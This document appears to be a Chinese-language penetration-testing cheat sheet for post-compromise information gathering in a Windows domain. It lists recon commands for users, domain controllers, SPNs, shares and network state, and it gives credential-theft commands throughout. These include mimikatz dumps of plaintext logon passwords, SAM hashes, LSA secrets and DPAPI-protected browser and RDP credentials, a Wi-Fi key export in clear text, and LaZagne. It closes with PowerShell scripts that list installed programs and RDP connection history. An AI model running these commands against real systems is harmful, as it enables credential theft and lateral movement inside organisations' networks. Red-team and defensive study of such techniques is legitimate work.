Windows 域内信息收集

1
2
3
4
5
6
7
8
9

用户 Hash 当前域 域控 域内计算机 spn IP地址 arp 缓存 dns 缓存 hosts

端口 进程 杀软 补丁 代理 已安装软件 本机凭证 ipc 共享 防火墙策略

计划任务 启动项 回收站 vpn 密码 wifi 密码 (如果有

rdp 记录 浏览器 cookies 历史记录 书签 已保存密码 

敏感文件 web 服务器 数据库 中间件

1
2
3
4

net user // 查看所有用户
net view // 查看计算机
net view /domain // 查看所有域
net user /domain // 查看域内用户

1
2

mimikatz "log" "privilege::debug" "sekurlsa::logonpasswords" “exit" // 明文密码
mimikatz "log" "privilege::debug" "lsadump::sam /system:system.hive /sam:sam.hive" "exit" // Hash

1
2
3
4

net group "Domain Controllers" /domain // 查看域控
net group "Domain Admins" /domain // 查看域管理员
net group "Enterprise Admins" /domain // 查看全局管理员
net time /domain // 定位当前域控

1
2

net share // 查看共享
net use // 查看连接

1
2
3
4

type C:\Windows\System32\drivers\etc\hosts // hosts 信息
ipconfig /all // ip dns 网关信息
ipconfig  /displaydns // dns 缓存
arp -a // arp 缓存

1
2
3
4

tasklist /svc // 查看当前进程
netstat -ano // 查看开放端口
cmdkey /list // 查看本机凭据
systeminfo // 本机信息 补丁

1
2

setspn -T test.com –q */* // 当前域的 spn 信息
setspn -q */* // 所有域的 spn 信息

1

schtasks /Query // 计划任务

1

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

1
2

reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run // 用户级别
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run // 系统级别

1
2

netsh firewall show config // 2003 防火墙策略
netsh advfirewall firewall show rule name=all // 2008 2012 防火墙策略

1

netsh wlan export profile interface=WLAN key=clear folder=C:\

1
2

$Recycler = (New-Object -ComObject Shell.Application).NameSpace(0xa);
foreach($file in $Recycler.items()){$file.path;$file.ExtendedProperty("{9B174B33-40FF-11D2-A27E-00C04FC30871} 2")+'\'+$file.name;$file.Type}

1

mimikatz.exe "log" "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

1
2
3
4
5

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* // 显示本机凭据
mimikatz "log" "privilege::debug" "dpapi::chrome /in:[FILENAME] /masterkey:[MASTERKEY]" "exit"
WebBrowserPassView.exe
lazagne.exe all
......

1

dir/b/s config.* // 在当前目录下搜索

1
2

Get-WmiObject -class Win32_Product |Select-Object -Property name // 不全
wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_Product get name /FORMAT:table // 不全

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

<#
.SYNOPSIS
This script can be used to list the programs that the current Windows system has installed.
Supprot x86 and x64 
Author: 3gstudent@3gstudent
License: BSD 3-Clause
#>

Function ListPrograms
{  
	param($RegPath)  
	$QueryPath = dir $RegPath -Name
	foreach($Name in $QueryPath)
	{
    	(Get-ItemProperty -Path $RegPath$Name).DisplayName
#        (Get-ItemProperty -Path $RegPath$Name).Publisher
#        (Get-ItemProperty -Path $RegPath$Name).DisplayVersion
	}
} 
if ([IntPtr]::Size -eq 8)
{
	Write-Host "[*] OS: x64"
	Write-Host "[*] List the 64 bit programs that have been installed"
	$RegPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
	ListPrograms -RegPath $RegPath

	Write-Host "[+] List the 32 bit programs that have been installed"

	$RegPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\"
	ListPrograms -RegPath $RegPath
 }
else
{
	Write-Host "[*] OS: x86"
 	Write-Host "[*] List the 32 bit programs that have been installed"
	$RegPath = "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\"
	ListPrograms -RegPath $RegPath
}

1
2

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* // 显示本机凭据
mimikatz "log" "privilege::debug" "dpapi::cred /in:[FILENAME] /masterkey:[MASTERKEY]" "exit" // 导出 rdp 密码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67

<#
.SYNOPSIS
This script will list all users' RDP Connections History.
First use "reg load" to load hive.
Then read the RDP Connections History from HKEY_USERS.
Last you need to use "reg unload" to unload hive. 
The script automatically implements the above operation,there is no need for a GUI. :)
Author: 3gstudent@3gstudent
License: BSD 3-Clause
#>
$AllUser = Get-WmiObject -Class Win32_UserAccount
foreach($User in $AllUser)
{
	$RegPath = "Registry::HKEY_USERS\"+$User.SID+"\Software\Microsoft\Terminal Server Client\Servers\"
	Write-Host "User:"$User.Name
	Write-Host "SID:"$User.SID
	Write-Host "Status:"$User.Status
	$QueryPath = dir $RegPath -Name -ErrorAction SilentlyContinue
	If(!$?)
	{
		Write-Host "[!]Not logged in"
		Write-Host "[*]Try to load Hive"
		$File = "C:\Documents and Settings\"+$User.Name+"\NTUSER.DAT"
		$Path = "HKEY_USERS\"+$User.SID
		Write-Host "[+]Path:"$Path 
		Write-Host "[+]File:"$File
		Reg load $Path $File
		If(!$?)
		{
			Write-Host "[!]Fail to load Hive"
			Write-Host "[!]No RDP Connections History"
		}
		Else
		{
			$QueryPath = dir $RegPath -Name -ErrorAction SilentlyContinue
			If(!$?)
			{
				Write-Host "[!]No RDP Connections History"
			}
			Else
			{
				foreach($Name in $QueryPath)
				{   
					$User = (Get-ItemProperty -Path $RegPath$Name -ErrorAction Stop).UsernameHint
					Write-Host "Server:"$Name
					Write-Host "User:"$User
				}
			}
			Write-Host "[*]Try to unload Hive"
			Start-Process powershell.exe -WindowStyle Hidden -ArgumentList "Reg unload $Path"		
		}
	}
	foreach($Name in $QueryPath)
	{   
		Try  
		{  
			$User = (Get-ItemProperty -Path $RegPath$Name -ErrorAction Stop).UsernameHint
			Write-Host "Server:"$Name
			Write-Host "User:"$User
		}
		Catch  
		{
			Write-Host "[!]No RDP Connections History"
		}
	}
	Write-Host "----------------------------------"	
}